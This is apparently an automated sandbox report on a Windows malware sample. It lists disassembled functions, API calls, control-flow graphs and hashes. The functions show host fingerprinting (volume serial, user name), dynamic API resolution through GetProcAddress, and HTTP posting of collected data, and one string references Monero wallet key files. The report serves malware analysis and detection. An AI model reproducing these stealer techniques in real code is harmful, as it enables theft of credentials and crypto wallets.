                                        • Opcode Fuzzy Hash: 72bd841b7b0a38c003cb5e0e446a24899662406fa5f60915d978650285b9ed44
                                        • Instruction Fuzzy Hash: A4716F75A00218EBEF24EFA4CC55FEE7779BB84700F108199F10A6B294DBB46A84CF51
                                        Function 00987690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1356 987690-9876da GetWindowsDirectoryA 1357 9876dc 1356->1357 1358 9876e3-987757 GetVolumeInformationA call 988e90 * 3 1356->1358 1357->1358 1365 987768-98776f 1358->1365 1366 98778c-9877a7 GetProcessHeap RtlAllocateHeap 1365->1366 1367 987771-98778a call 988e90 1365->1367 1369 9877b8-9877e8 wsprintfA call 98aa50 1366->1369 1370 9877a9-9877b6 call 98aa50 1366->1370 1367->1365 1377 98780e-98781e 1369->1377 1370->1377
                                        APIs
                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 009876D2
                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0098770F
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00987793
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0098779A
                                        • wsprintfA.USER32 ref: 009877D0
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                        • String ID: :$C$\
                                        • API String ID: 1544550907-3809124531
                                        • Opcode ID: 7e6d67376ff3f0327de4d0ce5fe53328949e3dee14c7f839953dd093ef5068d8
                                        • Instruction ID: 175b4f7d2ef69218182cf552329e116f4cfdc36c116c0859a1d029f4d2f6b87a
                                        • Opcode Fuzzy Hash: 7e6d67376ff3f0327de4d0ce5fe53328949e3dee14c7f839953dd093ef5068d8
                                        • Instruction Fuzzy Hash: C44192B1D04248DBDB10EB94CC85BDEBBB8AF49704F100599F609AB381D778AA44CBA5
                                        Function 009879E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009711B7), ref: 00987A10
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00987A17
                                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00987A2F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateNameProcessUser
                                        • String ID:
                                        • API String ID: 1296208442-0
                                        • Opcode ID: aa7526862bb4656cba044683ca16528ba122c29d6be7e93b33ced2d3ece4fb93
                                        • Instruction ID: 23d683f2aa2f2c830866c772af45f3df54bfc358676e86d791e37033e345858f
                                        • Opcode Fuzzy Hash: aa7526862bb4656cba044683ca16528ba122c29d6be7e93b33ced2d3ece4fb93
                                        • Instruction Fuzzy Hash: 49F04FB5948209EFC714DF98DD45BAEFBB8FB45711F10021AF615A3780C7B55504CBA1
                                        Function 00971160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitInfoProcessSystem
                                        • String ID:
                                        • API String ID: 752954902-0
                                        • Opcode ID: 9b08932b31bebae468ba05a194ea960666917288accee1e282e23146c414462d
                                        • Instruction ID: 1c0246e945d76eb85686fc5d4a3556297d2d5a10127dee7fd4595d68a4862d69
                                        • Opcode Fuzzy Hash: 9b08932b31bebae468ba05a194ea960666917288accee1e282e23146c414462d
                                        • Instruction Fuzzy Hash: AAD05E7890830C9BCB00DFE0D8497DDBB78BB09225F000655D90962240EB305441CA65
                                        Function 00989F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 633 989f20-989f2a 634 989f30-98a341 GetProcAddress * 43 633->634 635 98a346-98a3da LoadLibraryA * 8 633->635 634->635 636 98a3dc-98a451 GetProcAddress * 5 635->636 637 98a456-98a45d 635->637 636->637 638 98a463-98a521 GetProcAddress * 8 637->638 639 98a526-98a52d 637->639 638->639 640 98a5a8-98a5af 639->640 641 98a52f-98a5a3 GetProcAddress * 5 639->641 642 98a5b5-98a642 GetProcAddress * 6 640->642 643 98a647-98a64e 640->643 641->640 642->643 644 98a72f-98a736 643->644 645 98a654-98a72a GetProcAddress * 9 643->645 646 98a738-98a7ad GetProcAddress * 5 644->646 647 98a7b2-98a7b9 644->647 645->644 646->647 648 98a7bb-98a7e7 GetProcAddress * 2 647->648 649 98a7ec-98a7f3 647->649 648->649 650 98a825-98a82c 649->650 651 98a7f5-98a820 GetProcAddress * 2 649->651 652 98a922-98a929 650->652 653 98a832-98a91d GetProcAddress * 10 650->653 651->650 654 98a92b-98a988 GetProcAddress * 4 652->654 655 98a98d-98a994 652->655 653->652 654->655 656 98a9ae-98a9b5 655->656 657 98a996-98a9a9 GetProcAddress 655->657 658 98aa18-98aa19 656->658 659 98a9b7-98aa13 GetProcAddress * 4 656->659 657->656 659->658
                                        APIs
                                        • GetProcAddress.KERNEL32(76210000,01805468), ref: 00989F3D
                                        • GetProcAddress.KERNEL32(76210000,01805488), ref: 00989F55
                                        • GetProcAddress.KERNEL32(76210000,01819058), ref: 00989F6E
                                        • GetProcAddress.KERNEL32(76210000,01818FF8), ref: 00989F86
                                        • GetProcAddress.KERNEL32(76210000,01819040), ref: 00989F9E
                                        • GetProcAddress.KERNEL32(76210000,0181D910), ref: 00989FB7
                                        • GetProcAddress.KERNEL32(76210000,0180A748), ref: 00989FCF
                                        • GetProcAddress.KERNEL32(76210000,0181D9B8), ref: 00989FE7
                                        • GetProcAddress.KERNEL32(76210000,0181D9D0), ref: 0098A000
                                        • GetProcAddress.KERNEL32(76210000,0181D7D8), ref: 0098A018
                                        • GetProcAddress.KERNEL32(76210000,0181DA90), ref: 0098A030
                                        • GetProcAddress.KERNEL32(76210000,018055E8), ref: 0098A049
                                        • GetProcAddress.KERNEL32(76210000,01805508), ref: 0098A061
                                        • GetProcAddress.KERNEL32(76210000,01805528), ref: 0098A079
                                        • GetProcAddress.KERNEL32(76210000,01805548), ref: 0098A092
                                        • GetProcAddress.KERNEL32(76210000,0181D9A0), ref: 0098A0AA
                                        • GetProcAddress.KERNEL32(76210000,0181DA78), ref: 0098A0C2
                                        • GetProcAddress.KERNEL32(76210000,0180A4F0), ref: 0098A0DB
                                        • GetProcAddress.KERNEL32(76210000,01805568), ref: 0098A0F3
                                        • GetProcAddress.KERNEL32(76210000,0181D970), ref: 0098A10B
                                        • GetProcAddress.KERNEL32(76210000,0181D9E8), ref: 0098A124
                                        • GetProcAddress.KERNEL32(76210000,0181DA00), ref: 0098A13C
                                        • GetProcAddress.KERNEL32(76210000,0181DAA8), ref: 0098A154
                                        • GetProcAddress.KERNEL32(76210000,01805608), ref: 0098A16D
                                        • GetProcAddress.KERNEL32(76210000,0181D958), ref: 0098A185
                                        • GetProcAddress.KERNEL32(76210000,0181D988), ref: 0098A19D
                                        • GetProcAddress.KERNEL32(76210000,0181D8B0), ref: 0098A1B6
                                        • GetProcAddress.KERNEL32(76210000,0181D8C8), ref: 0098A1CE
                                        • GetProcAddress.KERNEL32(76210000,0181D838), ref: 0098A1E6
                                        • GetProcAddress.KERNEL32(76210000,0181D868), ref: 0098A1FF
                                        • GetProcAddress.KERNEL32(76210000,0181DA18), ref: 0098A217
                                        • GetProcAddress.KERNEL32(76210000,0181DA30), ref: 0098A22F
                                        • GetProcAddress.KERNEL32(76210000,0181D7F0), ref: 0098A248
                                        • GetProcAddress.KERNEL32(76210000,0180FD18), ref: 0098A260
                                        • GetProcAddress.KERNEL32(76210000,0181DA48), ref: 0098A278
                                        • GetProcAddress.KERNEL32(76210000,0181DA60), ref: 0098A291
                                        • GetProcAddress.KERNEL32(76210000,01805588), ref: 0098A2A9
                                        • GetProcAddress.KERNEL32(76210000,0181D7C0), ref: 0098A2C1
                                        • GetProcAddress.KERNEL32(76210000,018056E8), ref: 0098A2DA
                                        • GetProcAddress.KERNEL32(76210000,0181D898), ref: 0098A2F2
                                        • GetProcAddress.KERNEL32(76210000,0181D808), ref: 0098A30A
                                        • GetProcAddress.KERNEL32(76210000,018055A8), ref: 0098A323
                                        • GetProcAddress.KERNEL32(76210000,01805648), ref: 0098A33B
                                        • LoadLibraryA.KERNEL32(0181D820,?,00985EF3,00990AEB,?,?,?,?,?,?,?,?,?,?,00990AEA,00990AE7), ref: 0098A34D
                                        • LoadLibraryA.KERNEL32(0181D850,?,00985EF3,00990AEB,?,?,?,?,?,?,?,?,?,?,00990AEA,00990AE7), ref: 0098A35E
                                        • LoadLibraryA.KERNEL32(0181D880,?,00985EF3,00990AEB,?,?,?,?,?,?,?,?,?,?,00990AEA,00990AE7), ref: 0098A370
                                        • LoadLibraryA.KERNEL32(0181D8E0,?,00985EF3,00990AEB,?,?,?,?,?,?,?,?,?,?,00990AEA,00990AE7), ref: 0098A382
                                        • LoadLibraryA.KERNEL32(0181D8F8,?,00985EF3,00990AEB,?,?,?,?,?,?,?,?,?,?,00990AEA,00990AE7), ref: 0098A393
                                        • LoadLibraryA.KERNEL32(0181D928,?,00985EF3,00990AEB,?,?,?,?,?,?,?,?,?,?,00990AEA,00990AE7), ref: 0098A3A5
                                        • LoadLibraryA.KERNEL32(0181D940,?,00985EF3,00990AEB,?,?,?,?,?,?,?,?,?,?,00990AEA,00990AE7), ref: 0098A3B7
                                        • LoadLibraryA.KERNEL32(0181DAC0,?,00985EF3,00990AEB,?,?,?,?,?,?,?,?,?,?,00990AEA,00990AE7), ref: 0098A3C8
                                        • GetProcAddress.KERNEL32(751E0000,01805188), ref: 0098A3EA
                                        • GetProcAddress.KERNEL32(751E0000,0181DAD8), ref: 0098A402
                                        • GetProcAddress.KERNEL32(751E0000,018189A8), ref: 0098A41A
                                        • GetProcAddress.KERNEL32(751E0000,0181DD90), ref: 0098A433
                                        • GetProcAddress.KERNEL32(751E0000,018051A8), ref: 0098A44B
                                        • GetProcAddress.KERNEL32(700F0000,0180A590), ref: 0098A470
                                        • GetProcAddress.KERNEL32(700F0000,018051C8), ref: 0098A489
                                        • GetProcAddress.KERNEL32(700F0000,0180A5B8), ref: 0098A4A1
                                        • GetProcAddress.KERNEL32(700F0000,0181DCE8), ref: 0098A4B9
                                        • GetProcAddress.KERNEL32(700F0000,0181DBE0), ref: 0098A4D2
                                        • GetProcAddress.KERNEL32(700F0000,018050E8), ref: 0098A4EA
                                        • GetProcAddress.KERNEL32(700F0000,01805048), ref: 0098A502
                                        • GetProcAddress.KERNEL32(700F0000,0181DC70), ref: 0098A51B
                                        • GetProcAddress.KERNEL32(753A0000,01804FC8), ref: 0098A53C
                                        • GetProcAddress.KERNEL32(753A0000,01805288), ref: 0098A554
                                        • GetProcAddress.KERNEL32(753A0000,0181DCD0), ref: 0098A56D
                                        • GetProcAddress.KERNEL32(753A0000,0181DCB8), ref: 0098A585
                                        • GetProcAddress.KERNEL32(753A0000,018052E8), ref: 0098A59D
                                        • GetProcAddress.KERNEL32(76310000,0180A518), ref: 0098A5C3
                                        • GetProcAddress.KERNEL32(76310000,0180A5E0), ref: 0098A5DB
                                        • GetProcAddress.KERNEL32(76310000,0181DBC8), ref: 0098A5F3
                                        • GetProcAddress.KERNEL32(76310000,018052A8), ref: 0098A60C
                                        • GetProcAddress.KERNEL32(76310000,01804F48), ref: 0098A624
                                        • GetProcAddress.KERNEL32(76310000,0180A7C0), ref: 0098A63C
                                        • GetProcAddress.KERNEL32(76910000,0181DD60), ref: 0098A662
                                        • GetProcAddress.KERNEL32(76910000,01805308), ref: 0098A67A
                                        • GetProcAddress.KERNEL32(76910000,018189B8), ref: 0098A692
                                        • GetProcAddress.KERNEL32(76910000,0181DD18), ref: 0098A6AB
                                        • GetProcAddress.KERNEL32(76910000,0181DAF0), ref: 0098A6C3
                                        • GetProcAddress.KERNEL32(76910000,018051E8), ref: 0098A6DB
                                        • GetProcAddress.KERNEL32(76910000,01805208), ref: 0098A6F4
                                        • GetProcAddress.KERNEL32(76910000,0181DDA8), ref: 0098A70C
                                        • GetProcAddress.KERNEL32(76910000,0181DD78), ref: 0098A724
                                        • GetProcAddress.KERNEL32(75B30000,01804FE8), ref: 0098A746
                                        • GetProcAddress.KERNEL32(75B30000,0181DBF8), ref: 0098A75E
                                        • GetProcAddress.KERNEL32(75B30000,0181DB20), ref: 0098A776
                                        • GetProcAddress.KERNEL32(75B30000,0181DB38), ref: 0098A78F
                                        • GetProcAddress.KERNEL32(75B30000,0181DC10), ref: 0098A7A7
                                        • GetProcAddress.KERNEL32(75670000,01804F88), ref: 0098A7C8
                                        • GetProcAddress.KERNEL32(75670000,01805268), ref: 0098A7E1
                                        • GetProcAddress.KERNEL32(76AC0000,01805228), ref: 0098A802
                                        • GetProcAddress.KERNEL32(76AC0000,0181DD30), ref: 0098A81A
                                        • GetProcAddress.KERNEL32(6F4E0000,01805008), ref: 0098A840
                                        • GetProcAddress.KERNEL32(6F4E0000,01805068), ref: 0098A858
                                        • GetProcAddress.KERNEL32(6F4E0000,01804F68), ref: 0098A870
                                        • GetProcAddress.KERNEL32(6F4E0000,0181DB08), ref: 0098A889
                                        • GetProcAddress.KERNEL32(6F4E0000,01805028), ref: 0098A8A1
                                        • GetProcAddress.KERNEL32(6F4E0000,018050C8), ref: 0098A8B9
                                        • GetProcAddress.KERNEL32(6F4E0000,01805248), ref: 0098A8D2
                                        • GetProcAddress.KERNEL32(6F4E0000,01804FA8), ref: 0098A8EA
                                        • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 0098A901
                                        • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 0098A917
                                        • GetProcAddress.KERNEL32(75AE0000,0181DB68), ref: 0098A939
                                        • GetProcAddress.KERNEL32(75AE0000,018189C8), ref: 0098A951
                                        • GetProcAddress.KERNEL32(75AE0000,0181DB50), ref: 0098A969
                                        • GetProcAddress.KERNEL32(75AE0000,0181DC58), ref: 0098A982
                                        • GetProcAddress.KERNEL32(76300000,01805108), ref: 0098A9A3
                                        • GetProcAddress.KERNEL32(6FE40000,0181DC28), ref: 0098A9C4
                                        • GetProcAddress.KERNEL32(6FE40000,018052C8), ref: 0098A9DD
                                        • GetProcAddress.KERNEL32(6FE40000,0181DB80), ref: 0098A9F5
                                        • GetProcAddress.KERNEL32(6FE40000,0181DC40), ref: 0098AA0D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: HttpQueryInfoA$InternetSetOptionA
                                        • API String ID: 2238633743-1775429166
                                        • Opcode ID: 7be5509b06fd1108f8ca403579fdb56eed4b4cf7e90cdf698bce0185210e9637
                                        • Instruction ID: 442d29dc3c2f07c8f9c7f48d9cd6ed04770ae288f39743d26af6cbfd60d1bfde
                                        • Opcode Fuzzy Hash: 7be5509b06fd1108f8ca403579fdb56eed4b4cf7e90cdf698bce0185210e9637
                                        • Instruction Fuzzy Hash: BE6218BD608241DFC354DFA8ED88B5E7BA9B78F602310871ABA09C3274D775A944CB61
                                        Function 009748D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 801 9748d0-974992 call 98aab0 call 974800 call 98aa50 * 5 InternetOpenA StrCmpCA 816 974994 801->816 817 97499b-97499f 801->817 816->817 818 9749a5-974b1d call 988cf0 call 98ac30 call 98abb0 call 98ab10 * 2 call 98acc0 call 98abb0 call 98ab10 call 98acc0 call 98abb0 call 98ab10 call 98ac30 call 98abb0 call 98ab10 call 98acc0 call 98abb0 call 98ab10 call 98acc0 call 98abb0 call 98ab10 call 98acc0 call 98ac30 call 98abb0 call 98ab10 * 2 InternetConnectA 817->818 819 974f1b-974f43 InternetCloseHandle call 98ade0 call 97a210 817->819 818->819 905 974b23-974b27 818->905 828 974f45-974f7d call 98ab30 call 98acc0 call 98abb0 call 98ab10 819->828 829 974f82-974ff2 call 988b20 * 2 call 98aab0 call 98ab10 * 8 819->829 828->829 906 974b35 905->906 907 974b29-974b33 905->907 908 974b3f-974b72 HttpOpenRequestA 906->908 907->908 909 974f0e-974f15 InternetCloseHandle 908->909 910 974b78-974e78 call 98acc0 call 98abb0 call 98ab10 call 98ac30 call 98abb0 call 98ab10 call 98acc0 call 98abb0 call 98ab10 call 98acc0 call 98abb0 call 98ab10 call 98acc0 call 98abb0 call 98ab10 call 98acc0 call 98abb0 call 98ab10 call 98ac30 call 98abb0 call 98ab10 call 98acc0 call 98abb0 call 98ab10 call 98acc0 call 98abb0 call 98ab10 call 98ac30 call 98abb0 call 98ab10 call 98acc0 call 98abb0 call 98ab10 call 98acc0 call 98abb0 call 98ab10 call 98acc0 call 98abb0 call 98ab10 call 98acc0 call 98abb0 call 98ab10 call 98ac30 call 98abb0 call 98ab10 call 98aa50 call 98ac30 * 2 call 98abb0 call 98ab10 * 2 call 98ade0 lstrlen call 98ade0 * 2 lstrlen call 98ade0 HttpSendRequestA 908->910 909->819 1021 974e82-974eac InternetReadFile 910->1021 1022 974eb7-974f09 InternetCloseHandle call 98ab10 1021->1022 1023 974eae-974eb5 1021->1023 1022->909 1023->1022 1024 974eb9-974ef7 call 98acc0 call 98abb0 call 98ab10 1023->1024 1024->1021
                                        APIs
                                          • Part of subcall function 0098AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0098AAF6
                                          • Part of subcall function 00974800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00974889
                                          • Part of subcall function 00974800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00974899
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00974965
                                        • StrCmpCA.SHLWAPI(?,0181FCB0), ref: 0097498A
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00974B0A
                                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00990DDE,00000000,?,?,00000000,?,",00000000,?,0181FCD0), ref: 00974E38
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00974E54
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00974E68
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00974E99
                                        • InternetCloseHandle.WININET(00000000), ref: 00974EFD
                                        • InternetCloseHandle.WININET(00000000), ref: 00974F15
                                        • HttpOpenRequestA.WININET(00000000,0181FB90,?,0181F008,00000000,00000000,00400100,00000000), ref: 00974B65
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                        • InternetCloseHandle.WININET(00000000), ref: 00974F1F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                        • String ID: "$"$------$------$------
                                        • API String ID: 460715078-2180234286
                                        • Opcode ID: 1c9ba34f2804cbeca5b07700e1c3eea47e49eb6bea3ce95945dbbd4d4301eb49
                                        • Instruction ID: d335d2f27b1fc94b24f5dadd0b7cb2328ead35c29dd6da180ec3d38ba4347e11
                                        • Opcode Fuzzy Hash: 1c9ba34f2804cbeca5b07700e1c3eea47e49eb6bea3ce95945dbbd4d4301eb49
                                        • Instruction Fuzzy Hash: 8C12EA72910118AADB15FB90DDA2FEEB379BF95300F10419AB10672291DF786F48CB62
